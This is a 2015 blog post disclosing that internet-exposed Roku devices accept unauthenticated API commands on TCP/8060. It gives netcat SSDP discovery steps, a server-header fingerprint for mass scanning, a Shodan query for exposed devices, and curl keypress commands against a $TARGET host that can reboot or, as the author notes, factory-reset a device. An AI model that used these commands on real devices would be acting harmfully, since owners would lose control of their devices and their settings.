07/25/2015

How to Reboot or Factory-reset 1761 Internet-facing Roku Devices with a Few Curl Commands ** UPDATE 3 [7/27/2015] – Some pretty rad research by John Matherly on the shodan blog based on some of these findings.

** UPDATE 2 [7/26/2015]: John Matherly of Shodan.io was kind enough to trigger an internet-wide scan of TCP/8060 to get a better picture of how many devices might be misconfigured to accept API commands from anyone on the internet. Should have some accurate numbers soon, but it’s currently looking like there are ~1900+ devices out there with their API ports hanging out all over the place. After digging a little bit more… The shodan search actually returned results for UPnP port 1900 and not 8060. 1900 is used by the Roku to advertise itself to other Roku’s on the same network using the SSDP protocol. I don’t believe it’s possible to use that port to issue the API commands i reference to IP’s with UDP/1900 open. Also, If you want to find the IP addresses of Roku devices on the network you’re on, you’ll have to: 1. create a file with the following in it: M-SEARCH * HTTP/1.1

Host: 239.255.255.250:1900

Man: "ssdp:discover"

ST: roku:ecp

[leave a blank line here] 2. Feed that request to netcat while connecting to the multicast address on UDP 1900: nc -u 239.255.255.250 1900 < ROKU_SSDP_REQUEST.txt 3. Use wireshark to catch any responses. You should see a Location response header with the IP of any Roku’s in the vicinity: HTTP/1.1 200 OK

Cache-Control: max-age=3600

ST: roku:ecp

USN: uuid:roku:ecp:[SERIALNUMBER]

Ext:

Server: Roku UPnP/1.0 MiniUPnPd/1.4

LOCATION: http://192.168.29.181:8060/ It still may be possible to identify Roku’s internet-facing TCP/8060 ports with something like a masscan where the internet IP’s respond with a Server header of “Roku UPnP/1.0 MiniUPnPd/1.4”: netcat [internet_ip] 8060 HTTP/1.1 400 Bad Request

Server: Roku UPnP/1.0 MiniUPnPd/1.4

Content-Length: 0 I Wrote a simple script you can use to bounce a Roku via a bash shell. You can modify this to navigate to other functions like… “factory reset” although that would just be MEAN. This script basically issues “keypress” commands to the API at TCP/8060 which in turn, navigates through the menus. Example:

curl -d ” http://$TARGET:8060/keypress/home

curl -d ” http://$TARGET:8060/keypress/down

curl -d ” http://$TARGET:8060/keypress/up

curl -d ” http://$TARGET:8060/keypress/right

etc… The Roku api keypress options are: Home

Rev

Fwd

Play

Select

Left

Right

Down

Up

Back

InstantReplay

Info

Backspace

Search

Enter

Lit_* You can use this as a reference to their API. Here’s a shodan query with what looks like Roku devices with their API ports facing the internet. *WHY* are they facing the internet? who knows…but that’s a horrible idea. https://www.shodan.io/search?query=ROKU There are currently 1761 Roku API ports exposed on the internet.

